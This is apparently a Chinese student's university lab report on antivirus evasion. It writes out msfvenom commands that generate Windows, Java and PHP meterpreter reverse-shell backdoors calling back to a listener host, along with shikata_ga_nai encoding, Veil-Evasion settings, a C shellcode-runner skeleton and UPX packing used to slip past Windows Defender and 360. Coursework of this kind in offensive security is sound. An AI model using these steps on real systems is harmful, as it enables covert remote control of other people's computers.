2018-2019-2 網絡對抗技術 20165231 Exp3 免殺原理與實踐

實踐內容（3.5分）

1.1 正確使用msf編碼器（0.5分），msfvenom生成如jar之類的其餘文件（0.5分），veil-evasion（0.5分），加殼工具（0.5分），使用shellcode編程（1分）
1.2 經過組合應用各類技術實現惡意代碼免殺(0.5分)
（若是成功實現了免殺的，簡單語言描述原理，不要截圖。與殺軟共生的結果驗證要截圖。）
1.3 用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本（加分0.5）
2.

基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？
檢測特徵碼、啓發式惡意軟件檢查和行爲。
（2）免殺是作什麼？
經過一些手段假裝使惡意代碼免遭殺軟查殺。
（3）免殺的基本方法有哪些？
有msfvenom編碼、使用veil-evasion等重寫惡意代碼、利用shellcode生成可執行文件、加殼等方法或者更高級的特徵碼修改包括文件特徵碼修改和內存特徵碼修改。

實驗過程

任務一：正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧；

一、使用msf編碼器

使用命令生成後門程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy.exe

將生成的程序上傳到virus total檢測

上傳virscan檢測

使用msf編碼器對後門程序編碼10次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy-10.exe

而後再傳到virus total上檢測

上傳virscan檢測

二、使用msfvenom生成jar

使用命令生成.jar包
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.70.131 lport=5231 x> 5231_backdoor.jar

上傳virscan檢測

三、使用msfvenom生成php

使用命令生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 x> 5231_backdoor.php
上傳virscan檢測

(竟然只有一個檢測出來了，是誰呢？）

（卡巴斯基，牛皮！烏拉！！！（破音！））

四、使用veil-evasion

安裝這個veil真的是，遇到提示別選Y手動安裝，直接s(silent)靜默安裝，系統決定，一切隨緣，手動安裝的下場就是這樣（ ⬜ ⬜ ⬜？ ⬜ ⬜。 ⬜ ⬜ ⬜！）

若是安裝失敗的，能夠去usr/share/veil/config 下運行setup.sh 從新安裝

最後安裝成功的輸入veil會有以下界面，而後輸入use evasion進入evil-evasion輸入命令use c/meterpreter/rev_tcp.py進入配置界面

set LHOST 192.168.70.131
set LPORT 5231
options

輸入generate生成文件，接着輸入你想要playload的名字

而後文件保存在/var/lib/veil/output/compiled/下，將生成文件提交掃描

任務二：Linux平臺交叉編譯Windows應用

五、利用shellcode編程

先執行shellcode生成命令獲得shellcode

而後建立個.c文件將shellcode代碼注入

「shellcode」
int main()
{
int (func)() = (int()())buf;
func();
}

執行i686-w64-mingw32-g++ 20165231.c -o 20165231.exe生成可執行的後門程序
而後上傳測一下

而後拖到主機上測試，被檢測出禁止運行而且Windows defender自動清理掉了（個人電腦早在三年前就卸載了360,電腦管家之類的，三年來的苟活憑藉的就是一身正氣加上微軟自帶的Windows Defender，我以爲那些東西不會讓我電腦比這個更安全只會讓它更卡！！！）

6.加殼測試

使用c+shellcode+加壓縮殼
實驗環境：被控機是win10實體機，沒有360和騰訊電腦管家，微軟自帶Windows defender防火牆殺毒全開。
原理：將shellcode替換到以上代碼的數組後給編譯生成的EXE文件加殼中達到免殺效果

使用壓縮殼（UPX）upx 20165231.exe -o wyhy5231.exe而後放到主機測試
放着不動或者用殺毒工具掃描就沒有報警，一旦運行直接警告，而且直接被刪

好的我錯了，我覺得就這麼經過了沒幾分鐘它就不見了！！！？？？系統又悄悄啓動掃描一遍而後偷偷把文件給刪了，而後再次放進主機共享文件夾就有危險報警了

爲了完成反彈回連給他白名單吧，可是………………

好吧只有整個文件夾給設置爲白名單吧（其實並沒啥用，仍是會被刪，而後去威脅詳細表裏面手動恢復)

最後按照上次實驗的步驟，我仍是控制了個人win10主機，而且拍了個照，Windows defender也沒有再幹預。

任務三：用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

免殺方法：先用msfvenom生成shellcode，再使用壓縮殼進行加殼。
實驗環境：對方電腦爲 win7實體機，360 11.5.0.2002

本機打開msf控制檯，開始監聽，受控機運行後門程序

開啓殺軟能絕對防止電腦中惡意代碼嗎？

不能，這次簡單的實驗都逃過一劫（雖然有些地方暫時啓用了白名單），高手總會想辦法模擬一些正常軟件的特徵而後不斷加殼加密或者更加高級的手段逃過殺軟的查殺。

實驗中遇到的問題

一、安裝veil-evasion過程當中出現不少彈窗提示你安裝，可是裏面的字卻又是方框，編碼錯誤顯示不出來。
解決：在安裝之除就選擇s靜默安裝，一切由系統本身設置安排。
二、虛擬機ping不通別的實體機
解決：把虛擬機網卡設置改成橋接模式就能夠了

實驗感想

本次實驗很長，很很差作，特別是veil，安裝時間長，出錯排查困難。通過此次實驗我也認識到殺軟也不是萬能的，總會有病毒庫裏沒出現過的新鮮玩意逃過一劫。想要電腦的安全就要作到本身不主動瀏覽不安全網站，不去下載不明軟件，再加上殺軟的一些防火牆功能，對於咱們普通人來講仍是很安全的。其次身邊同窗的實驗也讓我感覺到360 和安全管家真是愈來愈** 了，好好一臺電腦裝了這玩意兒就卡卡卡死了！